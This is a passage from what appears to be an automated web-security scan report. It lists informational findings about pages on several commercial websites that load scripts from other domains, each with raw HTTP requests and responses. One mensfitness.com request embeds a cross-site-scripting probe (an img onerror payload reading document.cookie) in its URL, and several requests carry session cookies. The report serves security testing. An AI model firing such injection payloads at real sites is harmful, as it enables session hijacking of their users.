<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<ti
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.613. http://www.ligattsecurity.com/solutions/boobytrap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/solutions/boobytrap

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /solutions/boobytrap HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/solutions
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.2.10.1296574600

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:33:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<ti
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.614. http://www.ligattsecurity.com/solutions/hacker-in-15-minutes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/solutions/hacker-in-15-minutes

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /solutions/hacker-in-15-minutes HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/solutions
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.2.10.1296574600

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:33:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<ti
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.615. http://www.ligattsecurity.com/wp-content/themes/elite-force/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/wp-content/themes/elite-force/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://www.stocktrader.org.uk/remote2/ST1-

Request

GET /wp-content/themes/elite-force/favicon.ico HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.1.10.1296574600

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Tue, 01 Feb 2011 15:33:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.stocktrader.org.uk/remote2/ST1-
1.php"></script>
...[SNIP]...

18.616. http://www.livestrong.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livestrong.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://i.lsimg.net/media/js/defaultnew-msh.js?v=1296531696
http://i.lsimg.net/media/js/homepage.js?v=1296531696
http://i.lsimg.net/media/js/optimost.js?v=1296531696
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.livestrong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:58:01 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=7110efa8adba60163d4df13d64f63be7; expires=Thu, 03 Feb 2011 15:58:01 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 43539

<!doctype html>
<html lang="en-US" class="main_content">
<head>
<title>LIVESTRONG.COM - Lose Weight & Get Fit with Diet, Nutrition & Fitness Tools</title>
<meta http-equiv="content-type" conte
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen, print" href="http://i.lsimg.net/media/css/homepage.css?v=1296531696" />
<script type="text/javascript" src="http://i.lsimg.net/media/js/defaultnew-msh.js?v=1296531696"></script>
<script type="text/javascript" src="http://i.lsimg.net/media/js/optimost.js?v=1296531696"></script>
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://i.lsimg.net/media/js/homepage.js?v=1296531696" ></script>
...[SNIP]...
</script>

   <script src="http://vs.dmtracker.com/tags/vs.js" type="text/javascript"></script>
...[SNIP]...
</noscript>

   <script src="http://js.revsci.net/gateway/gw.js?csid=F08747" type="text/javascript"></script>
...[SNIP]...

18.617. http://www.loansendorsed.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.loansendorsed.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET / HTTP/1.1
Host: www.loansendorsed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:31 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Connection: close
Content-Type: text/html
Content-Length: 101053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Top Lending Websites - All Your Lo
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

18.618. http://www.lodging.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lodging.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lodging.staticv.net/assets/lodging21287774952.590ada0513df1e57200132ce20deacf2.js?f=L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxdWVyeS5qcw__/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2RhdGUuanM_/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxdWVyeS5kYXRlUGlja2VyLmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pDYWxlbmRhci5qcw__/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxUG9wVXBPdmVybGF5Lmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxdWVyeS5kaW1lbnNpb25zLmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL3V0aWxzLmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL3Zhc3QuanM_/L3Jlc291cmNlcy92YXN0X3YzL3NjcmlwdHMvanFGb3JtVXRpbHMuanM_/1287774952.590ada0513df1e57200132ce20deacf2.js
http://www.google-analytics.com/urchin.js
http://www.google.com/afsonline/show_afs_ads.js

Request

GET / HTTP/1.1
Host: www.lodging.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA"
Set-Cookie: V_UID=108c31a8b837dc2a9f172ab4478a7f54; expires=Tue, 24-Jan-2012 15:44:45 GMT; path=/
Set-Cookie: V_T=19ad24574735baeae7b3a96b3fa7ec3d; expires=Wed, 02-Feb-2011 16:14:45 GMT; path=/
Set-Cookie: V_CHNL=KGRpcmVjdCk%3D; expires=Sat, 30-Jan-2021 15:44:45 GMT; path=/
Date: Wed, 02 Feb 2011 15:58:00 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Length: 27890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<link href="htt
...[SNIP]...
sZW5kYXIuY3Nz/L3Jlc291cmNlcy9sb2RnaW5nMi9jc3MvbWFpbi5jc3M_/L3Jlc291cmNlcy9sb2RnaW5nMi9jc3MvUG9wVXBPdmVybGF5LmNzcw__/1287774952.e9cb00599bdeb0536880642799edcb2a.css" rel="stylesheet" type="text/css" />
<script src="http://lodging.staticv.net/assets/lodging21287774952.590ada0513df1e57200132ce20deacf2.js?f=L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxdWVyeS5qcw__/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2RhdGUuanM_/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxdWVyeS5kYXRlUGlja2VyLmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pDYWxlbmRhci5qcw__/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxUG9wVXBPdmVybGF5Lmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL2pxdWVyeS5kaW1lbnNpb25zLmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL3V0aWxzLmpz/L3Jlc291cmNlcy9sb2RnaW5nMi9zY3JpcHRzL3Zhc3QuanM_/L3Jlc291cmNlcy92YXN0X3YzL3NjcmlwdHMvanFGb3JtVXRpbHMuanM_/1287774952.590ada0513df1e57200132ce20deacf2.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.619. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://js.adsonar.com/js/adsonar.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://s7.addthis.com/js/250/addthis_widget.js
http://secure-us.imrworldwide.com/v53.js
http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy

Request

GET /Tshirt_Workout/fitness/ab_exercises/136 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:33 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 1
Cache-Control: max-age=43200
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 02 Feb 2011 02:33:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44899
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

18.620. http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://secure-us.imrworldwide.com/v53.js
http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy

Request

GET /Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a HTTP/1.1
Host: www.mensfitness.com
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1509927900-1295974695655; __utmz=62324656.1295974696.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/73; __utma=62324656.1003724549.1295974696.1295974696.1295974696.1

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 14:26:53 GMT
Server: Apache/2.2.3 (Red Hat)
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Content-Length: 22761

<html>
<head>
<title>Contact Us - Men's Fitness</title>
<link rel="stylesheet" href="/site/mensfitness.css">

<script language = "JavaScript">
   
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

18.621. http://www.mensfitness.com/sports_and_recreation/outdoor_recreation/55 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/sports_and_recreation/outdoor_recreation/55

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://js.adsonar.com/js/adsonar.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://s7.addthis.com/js/250/addthis_widget.js
http://secure-us.imrworldwide.com/v53.js
http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy

Request

GET /sports_and_recreation/outdoor_recreation/55 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:32 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=20504
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 01 Feb 2011 20:15:15 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107102 (MII-APC/1.6)
Content-Length: 38976
Connection: close

<html>
<head>

<title>Tri This - Men's Fitness</title>

<meta name="Description" content="There's no better way to test your summer fitness than competing in a triathlon.">

<meta name="Keywords" co
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

18.622. http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthorneaucklandcity/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthorneaucklandcity/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:54 GMT
ETag: "147bb-c926-2222abd2"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.623. http://www.millenniumhotels.co.nz/copthornebayofislands/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornebayofislands/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornebayofislands/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:52 GMT
ETag: "20d1d-caa1-74daf70a"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.624. http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornechristchurchairport/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornechristchurchairport/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:04:52 GMT
ETag: "16e5c-c8c7-4b76b63c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.625. http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornechristchurchcentral/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornechristchurchcentral/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:04:39 GMT
ETag: "1eda8-ca04-9d826400"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.626. http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornechristchurchcity/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornechristchurchcity/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:42 GMT
ETag: "206b3-c94a-216db623"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.627. http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornedurhamstreet/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthornedurhamstreet/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:39 GMT
ETag: "21a0c-cb7e-741c3aea"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mcilnz"></script>
...[SNIP]...

18.628. http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthorneharbourcity/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /copthorneharbourcity/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:35 GMT
ETag: "21714-f14e-21041790"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:14 GMT
Connection: close
Connection: Transfer-Encoding
